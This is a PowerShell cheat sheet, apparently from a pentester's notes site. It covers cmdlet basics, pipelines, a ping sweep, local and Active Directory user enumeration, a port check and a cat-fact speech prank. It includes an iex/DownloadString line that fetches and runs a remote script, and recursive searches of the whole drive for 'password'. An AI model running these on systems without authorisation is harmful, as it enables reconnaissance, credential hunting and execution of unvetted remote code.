Powershell

Basics

Use Get-Member to list all properties and methods of an object!

get-command set*    # Searches for all cmdlets that start with "set"
alias               # List all aliases in shell
Get-ChildItem       # Same as ls, dir, and gci
Copy-Item           # Same as cp, copy, and cpi
Move-Item           # Same as mv, move, and mi
Select-String       # Same as sls and similar to grep
Get-Help            # Get help!!
Get-Content         # Same as cat, type, gc
Get-Process         # Same as ps, gps
Get-Location        # Same as pwd, gl
Get-Member          # Get properties and methods of objects - USEFUL!!!!
ps | format-list -property name, id, starttime    # Formatted list of process properties
ls env:             # List all PS environment variables
ls variable:        # List all PS variables

Getting Help

help gci                # displays help for Get-ChildItem
help gci -detailed      # Very verbose help information
help gci -examples      # Examples on how to USE it!!!
help gci -full          # Pretty much everything it has about it
Remove-Item *.* -WhatIf    # Explains what WOULD happen, but not actually do it

Pipeline Objects

Used to help automate between operations in a pipe. The % is an alias for ForEach-Object command. The current object in an array of objects is referred to as $_. Pipeline objects can be filtered with the ? alias for Where-Object. Command below will write out all names and PIDs of processes returned by ps alias.

ps | gm        # Find all properties and methods first
ps | % {write-host "name is" $_.name " and pid is " $_.ID}
ps | ? {write-host "Running PID name is " $_.status -eq "running"}

# Counting loops to move between two sets of numbers
1..10 | % {echo $_}
1..255 | % {ping -n 1 192.168.0.$_ | select-string ttl}

Enumerate Local Users

Enumerate the local users on the machine and print out important information about their accounts.

Get-LocalUser | Select-Object Name, LastLogon, PasswordLastSet, Enabled, PasswordRequired, PrincipalSource, Description | Format-Table -AutoSize

Enumerate AD Users

iex (new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1');Import-ActiveDirectory

Searching

Looking for files and directories.

# Search the entire C:\ dir for anything with "password" in the filename. Put stderr in null where it belongs
gci -recurse C:\ password 2>$null | % {echo $_.fullname}

# Select-string works similar to grep
select-string -path C:\Users\*.txt -pattern password

# Put both together! Look in each file for the string "password"
gci -recurse C:\ | % {select-string -path $_ -pattern password} 2>$null

Navigate Registry

# Can navigate Reg just like the file system using tab completion
cd HKLM:\

Launch Browsers and reach a specific page

"C:\Program Files\Internet Explorer\iexplore.exe" m4lwhere.org
"C:\Program Files\Mozilla Firefox\firefox.exe" m4lwhere.org

Networking

Quick and dirty way to check if a port is open on a remote computer

New-Object System.Net.Sockets.TCPClient –Argument "10.0.0.1","389"

Speaking to the Users!

This is a hilarious way to download a random cat fact and have it speak to the user through the speaker.

Add-Type -AssemblyName System.Speech
$SpeechSynth = New-Object System.Speech.Synthesis.SpeechSynthesizer
$SpeechSynth.SelectVoice("Microsoft Zira Desktop")
$Browser = New-Object System.Net.WebClient
$Browser.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$CatFact = (ConvertFrom-Json (Invoke-WebRequest -Verbose -Uri https://catfact.ninja/fact -UseBasicParsing))
$CatFact.fact
$SpeechSynth.Speak("Did you know ?")
$SpeechSynth.Speak($CatFact.fact)

PreviousEnumeration NextCmd

Last updated 2 years ago

Was this helpful?

get-command set* # Searches for all cmdlets that start with "set" alias # List all aliases in shell Get-ChildItem # Same as ls, dir, and gci Copy-Item # Same as cp, copy, and cpi Move-Item # Same as mv, move, and mi Select-String # Same as sls and similar to grep Get-Help # Get help!! Get-Content # Same as cat, type, gc Get-Process # Same as ps, gps Get-Location # Same as pwd, gl Get-Member # Get properties and methods of objects - USEFUL!!!! ps | format-list -property name, id, starttime # Formatted list of process properties ls env: # List all PS environment variables ls variable: # List all PS variables

help gci # displays help for Get-ChildItem help gci -detailed # Very verbose help information help gci -examples # Examples on how to USE it!!! help gci -full # Pretty much everything it has about it Remove-Item *.* -WhatIf # Explains what WOULD happen, but not actually do it

ps | gm # Find all properties and methods first ps | % {write-host "name is" $_.name " and pid is " $_.ID} ps | ? {write-host "Running PID name is " $_.status -eq "running"} # Counting loops to move between two sets of numbers 1..10 | % {echo $_} 1..255 | % {ping -n 1 192.168.0.$_ | select-string ttl}

# Search the entire C:\ dir for anything with "password" in the filename. Put stderr in null where it belongs gci -recurse C:\ password 2>$null | % {echo $_.fullname} # Select-string works similar to grep select-string -path C:\Users\*.txt -pattern password # Put both together! Look in each file for the string "password" gci -recurse C:\ | % {select-string -path $_ -pattern password} 2>$null

Add-Type -AssemblyName System.Speech $SpeechSynth = New-Object System.Speech.Synthesis.SpeechSynthesizer $SpeechSynth.SelectVoice("Microsoft Zira Desktop") $Browser = New-Object System.Net.WebClient $Browser.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $CatFact = (ConvertFrom-Json (Invoke-WebRequest -Verbose -Uri https://catfact.ninja/fact -UseBasicParsing)) $CatFact.fact $SpeechSynth.Speak("Did you know ?") $SpeechSynth.Speak($CatFact.fact)